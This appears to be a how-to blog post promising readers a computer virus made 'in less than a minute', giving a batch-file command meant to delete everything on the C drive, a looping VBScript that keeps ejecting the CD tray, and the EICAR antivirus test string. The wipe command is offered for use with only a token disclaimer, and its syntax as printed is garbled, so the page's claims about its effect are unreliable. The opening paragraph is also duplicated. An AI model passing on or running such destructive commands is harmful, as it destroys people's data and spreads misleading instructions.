There are hundreds kind of viruses like Trojan Horses and many more. We always use Antivirus to get rid of then. But did you ever think to make a Computer Virus? Maybe yes or maybe no. So if you are interested to know how to make a Computer Virus, just follow the steps listed below. In these days almost every single person who have knowledge about internet also know about a Virus. We have hear about it when we started to use Computers. A computer virus is a malicious program which may enter to your PC or Laptop and easily effect your OS and the data in it in different ways. There are hundreds kind of viruses like Trojan Horses and many more. We always use Antivirus to get rid of then. But did you ever think to make a Computer Virus? Maybe yes or maybe no. So if you are interested to know how to make a one, just follow the steps listed below.
How To Make A Computer Virus In Less Than A Minute: Check This Out!
> Check Out: Create A Bootable Windows 10 USB Flash drive (Step By Step Guide)
You don’t need to be a technical expert to create a computer virus. The method shared below will take only 60 seconds or less. This tutorial on how to make a computer virus is only for knowledge purpose, so please don’t use it to harm someone’s Computer.
Steps To Make A Computer Virus In Less Than A Minute
#1. Creating a Dangerous Virus
- For this kind of computer virus, first open Notepad on your Windows.
- Then, just copy and paste the given code into your Notepad.
@Echo off Del C: *.* |y
- Now save the file as virus.bat. You can choose any name you want to save a file but .bat must be used after that.
So when you run this file, your c drive will be delete completely and OS of your computer will also get corrupted.
> Check Out: Can i leave my laptop always charged? Will it damage the battery?
#2. Creating a Harmless CD-ROM Computer Virus
For this one, open Notepad and just copy paste the given code in it. After that save the file as CD-ROM.vbs or any name with .vbs
Set oWMP = CreateObject(“WMPlayer.OCX.7”) Set colCDROMs = oWMP.cdromCollection do if colCDROMs.Count >= 1 then For i = 0 to colCDROMs.Count – 1 colCDROMs.Item(i).Eject Next For i = 0 to colCDROMs.Count – 1 colCDROMs.Item(i).Eject Next End If wscript.sleep 5000 loop
You will be amazed to see the result when you will run this file. Your CD or DVD drive will continuously get ejected.
So if you want to stop the virus. Just follow this.
Task Manager > Select Process Tab > End wscript.exe file.
> Check Out: Tips On How To Boost Your Broadband Internet Speed Using CMD
#3. Create A Computer Virus To Test Your Antivirus
Open the Notepad and paste the code which is given below. then simply just save the file as EICAR.COM.
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
If your antivirus is ok then it will easily remove this virus and you will get to know that your antivirus is running well.
> Read Next: How To Export WhatsApp Chat as PDF using WPS Office
So above we have shared three methods on how to easily make a computer virus in less than one minute. If you have any request, let us know in the comment section below. Feel free to share the article with others, follow us on twitter and facebook for more news and updates.